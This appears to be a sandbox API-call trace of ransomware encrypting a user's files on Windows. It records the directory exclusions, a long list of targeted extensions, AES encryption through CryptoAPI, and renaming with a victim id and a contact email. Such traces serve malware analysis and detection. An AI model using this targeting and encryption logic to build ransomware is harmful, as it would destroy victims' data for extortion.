	[0190.823] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\*.*"), lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2f4b4ef0, ftCreationTime.dwHighDateTime=0x1d97041, ftLastAccessTime.dwLowDateTime=0x9d63b90, ftLastAccessTime.dwHighDateTime=0x1d97626, ftLastWriteTime.dwLowDateTime=0x9d63b90, ftLastWriteTime.dwHighDateTime=0x1d97626, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9bf0
	[0190.823] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\*.*") returned 42
	[0190.823] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0190.823] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\*.*", cchLength=0x2a | out: lpsz="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\*.*") returned 0x2a
	[0190.823] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.824] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\*.*", lpSrch="windows") returned 0x0
	[0190.824] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.824] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\*.*", lpSrch="boot") returned 0x0
	[0190.824] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.824] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\*.*", lpSrch="system volume information") returned 0x0
	[0190.824] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.824] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0190.825] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.825] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\*.*", lpSrch="temp") returned 0x0
	[0190.825] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.825] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\*.*", lpSrch="program files") returned 0x0
	[0190.825] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.825] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\*.*", lpSrch="program files (x86)") returned 0x0
	[0190.825] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.826] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\*.*", lpSrch="appdata") returned 0x0
	[0190.826] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.826] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\*.*", lpSrch="application data") returned 0x0
	[0190.826] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.826] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\*.*", lpSrch="winnt") returned 0x0
	[0190.826] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.826] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\*.*", lpSrch="tmp") returned 0x0
	[0190.826] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.827] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\*.*", lpSrch="cache") returned 0x0
	[0190.827] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.827] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\*.*", lpSrch="temporary internet files") returned 0x0
	[0190.827] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.827] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\*.*", lpSrch="webcache") returned 0x0
	[0190.827] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.827] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\*.*", lpSrch="inetcache") returned 0x0
	[0190.828] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.828] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\*.*", lpSrch="nvidia") returned 0x0
	[0190.828] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.828] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\*.*", lpSrch="packages") returned 0x0
	[0190.828] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.828] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\*.*", lpSrch="cookies") returned 0x0
	[0190.828] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.828] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\*.*", lpSrch="programdata") returned 0x0
	[0190.829] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2f4b4ef0, ftCreationTime.dwHighDateTime=0x1d97041, ftLastAccessTime.dwLowDateTime=0x9d63b90, ftLastAccessTime.dwHighDateTime=0x1d97626, ftLastWriteTime.dwLowDateTime=0x9d63b90, ftLastWriteTime.dwHighDateTime=0x1d97626, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0190.829] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xab8e4040, ftCreationTime.dwHighDateTime=0x1d96b81, ftLastAccessTime.dwLowDateTime=0xcd574540, ftLastAccessTime.dwHighDateTime=0x1d96de4, ftLastWriteTime.dwLowDateTime=0xcd574540, ftLastWriteTime.dwHighDateTime=0x1d96de4, nFileSizeHigh=0x0, nFileSizeLow=0xbda, dwReserved0=0x0, dwReserved1=0x0, cFileName="cK0z.m4a", cAlternateFileName="")) returned 1
	[0190.829] lstrcmpW (lpString1="cK0z.m4a", lpString2="..") returned 1
	[0190.829] lstrcmpW (lpString1="cK0z.m4a", lpString2=".") returned 1
	[0190.829] lstrcpyW (in: lpString1=0x18bdf4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\") returned="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\"
	[0190.829] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\", lpString2="cK0z.m4a" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\cK0z.m4a") returned="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\cK0z.m4a"
	[0190.829] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\cK0z.m4a") returned 47
	[0190.829] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0190.830] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\cK0z.m4a", cchLength=0x2f | out: lpsz="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\ck0z.m4a") returned 0x2f
	[0190.830] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.830] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\ck0z.m4a", lpSrch="help_decrypt_your_files") returned 0x0
	[0190.849] lstrcpyW (in: lpString1=0x18b99c, lpString2="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\ck0z.m4a" | out: lpString1="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\ck0z.m4a") returned="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\ck0z.m4a"
	[0190.849] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\ck0z.m4a") returned 47
	[0190.849] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0190.850] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.850] StrStrW (lpFirst=".m4a", lpSrch=".") returned=".m4a"
	[0190.850] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.850] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".m4a") returned=".m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0190.850] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0190.851] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0190.851] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\ck0z.m4a" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\ck0z.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c0
	[0190.851] ReadFile (in: hFile=0x2c0, lpBuffer=0xfda128, nNumberOfBytesToRead=0xbda, lpNumberOfBytesRead=0x18b350, lpOverlapped=0x0 | out: lpBuffer=0xfda128*, lpNumberOfBytesRead=0x18b350*=0xbda, lpOverlapped=0x0) returned 1
	[0190.854] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0190.854] CryptAcquireContextW (in: phProv=0x18af00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18af00*=0xfcba18) returned 1
	[0190.856] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0190.856] CryptCreateHash (in: hProv=0xfcba18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18af04 | out: phHash=0x18af04) returned 1
	[0190.857] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0190.857] CryptHashData (hHash=0xfb9830, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0190.857] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0190.857] CryptDeriveKey (in: hProv=0xfcba18, Algid=0x6610, hBaseData=0xfb9830, dwFlags=0x1, phKey=0x18af08 | out: phKey=0x18af08*=0xfb9670) returned 1
	[0190.857] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0190.858] CryptEncrypt (in: hKey=0xfb9670, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18af1c*=0xbda, dwBufLen=0xbda | out: pbData=0x0*, pdwDataLen=0x18af1c*=0xbe0) returned 1
	[0190.858] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0190.858] RtlMoveMemory (in: Destination=0xfdb348, Source=0xfda128, Length=0xbda | out: Destination=0xfdb348) 
	[0190.858] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0190.858] CryptEncrypt (in: hKey=0xfb9670, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfdb348*, pdwDataLen=0x18aefc*=0xbda, dwBufLen=0xbe0 | out: pbData=0xfdb348*, pdwDataLen=0x18aefc*=0xbe0) returned 1
	[0190.858] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0190.859] CryptDestroyKey (hKey=0xfb9670) returned 1
	[0190.859] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0190.859] CryptDestroyHash (hHash=0xfb9830) returned 1
	[0190.859] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0190.859] CryptReleaseContext (hProv=0xfcba18, dwFlags=0x0) returned 1
	[0190.859] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0190.859] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18af18, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18af18*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0190.860] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0190.860] GetUserNameA (in: lpBuffer=0x18adfc, pcbBuffer=0x18af14 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18af14) returned 1
	[0190.861] wsprintfW (in: param_1=0x18af30, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\ck0z.m4a.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 89
